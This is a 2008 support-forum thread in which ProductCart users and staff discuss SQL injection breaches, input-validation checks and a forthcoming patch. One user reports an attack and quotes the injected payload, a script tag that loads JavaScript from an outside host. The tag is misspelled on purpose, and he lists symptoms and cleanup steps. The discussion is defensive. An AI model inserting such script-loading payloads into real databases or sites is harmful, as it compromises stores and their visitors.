ProductCart E-Commerce Solutions Homepage
Forum Home Forum Home > ProductCart > Using ProductCart
  New Posts New Posts RSS Feed - Database Breach
  FAQ FAQ  Forum Search   Events   Register Register  Login Login

Database Breach

 Post Reply Post Reply Page  <123
Author
Message
ProductCart View Drop Down
Admin Group
Admin Group

ProductCart Team

Joined: 01-October-2003
Status: Offline
Points: 135
Post Options Post Options   Thanks (0) Thanks(0)   Quote ProductCart Quote  Post ReplyReply Direct Link To This Post Posted: 18-May-2008 at 7:35pm
Hi Dan,

Could you clarify which version of ProductCart you were using at the time the SQL injection attack occurred, and whether any custom forms  (or customized ProductCart pages) were used on the Web site?

Also, if you haven't already done so, certainly submit a support ticket.
The ProductCart Team

Home of ProductCart shopping cart software
Back to Top
Greg Dinger View Drop Down
Certified ProductCart Developers
Certified ProductCart Developers
Avatar

Joined: 23-September-2006
Location: United States
Status: Offline
Points: 238
Post Options Post Options   Thanks (0) Thanks(0)   Quote Greg Dinger Quote  Post ReplyReply Direct Link To This Post Posted: 18-May-2008 at 8:20pm
I think another question to be asked is if there were any non-ProductCart scripts in use.  The original poster of this thread got nailed through a vendor page, and not as a result of any ProductCart vulnerability.  Might that be what happened here?
 
And why only one day's backup?  Does your host not provide a deeper backup than the most recent day?  What database are you running?
Back to Top
Hamish View Drop Down
Admin Group
Admin Group


Joined: 12-October-2006
Location: United Kingdom
Status: Offline
Points: 56
Post Options Post Options   Thanks (0) Thanks(0)   Quote Hamish Quote  Post ReplyReply Direct Link To This Post Posted: 21-May-2008 at 1:19pm
Hi,
   I've seen the email referring to SQL injection attacks and that isNumeric should not be used in custom forms.
I did a quick scan of the souce code and see about 50 files  in the pc directory that contain isNumeric.   We are running V3.11 and the email says all versions after 2.7 should be OK.
Am I correct in presuming then, that the specific uses of isNumeric that remain are fine?


Back to Top
ProductCart View Drop Down
Admin Group
Admin Group

ProductCart Team

Joined: 01-October-2003
Status: Offline
Points: 135
Post Options Post Options   Thanks (0) Thanks(0)   Quote ProductCart Quote  Post ReplyReply Direct Link To This Post Posted: 21-May-2008 at 1:45pm
Yes, that is correct. validNum cannot be used on numbers that are not integers. Those numbers are NEVER used in a query as an ID (e.g. a product or category ID is always an integer).

We will send out a new update in the next couple of hours. We believe we have found and fixed the vulnerability. We are just doing some final testing.
The ProductCart Team

Home of ProductCart shopping cart software
Back to Top
Hamish View Drop Down
Admin Group
Admin Group


Joined: 12-October-2006
Location: United Kingdom
Status: Offline
Points: 56
Post Options Post Options   Thanks (0) Thanks(0)   Quote Hamish Quote  Post ReplyReply Direct Link To This Post Posted: 21-May-2008 at 3:05pm
Ok - Thanks, that's great :-) 
Back to Top
MarkCoyle View Drop Down
Senior Member
Senior Member


Joined: 06-June-2006
Location: United Kingdom
Status: Offline
Points: 0
Post Options Post Options   Thanks (0) Thanks(0)   Quote MarkCoyle Quote  Post ReplyReply Direct Link To This Post Posted: 16-June-2008 at 6:24am
Hi all

I have just been attacked with a database SQL insert overnight.

This time it was:
<scrrrript src=http://www.jumpbnr.com/b.js></scrrrrript>

(misspelling of script is deliberate above to avoid any issues).

It's a very similar situation to everyone else with an issue though as you can see to a different site.

Early Impact have been helpful and I have been able to remove it using the SQL insert query they provide.  However it also removed all flash media players from the site too so I'm going back to Friday's backup and having that restored.

As these types of hacks seem to be on the rise here were the symptoms I discovered when viewing the site this morning in case anyone else is hit:
1.  No product cart images were showing up with just the URLs to the images showing.
2.  When the site was loading if I looked at the status bar I could see mention of the jumpbnr.com site which of course shouldn't be there.

I then went to look via MySQL admin and found the string I mentioned with the script inserted into each field.

I thought I was patched already but have reapplied it via FTP just in case.

I will also be investigating HackerSafe as soon as things are back.

Any tips, experiences and thoughts welcome.   As a user community we need to keep on top of this and track all the variants so that each of us is fully aware and can provide the latest advice.

Many kind thanks

cheers
Mark

Back to Top
 Post Reply Post Reply Page  <123
  Share Topic   

Forum Jump Forum Permissions View Drop Down

Forum Software by Web Wiz Forums® version 12.04
Copyright ©2001-2021 Web Wiz Ltd.

This page was generated in 0.031 seconds.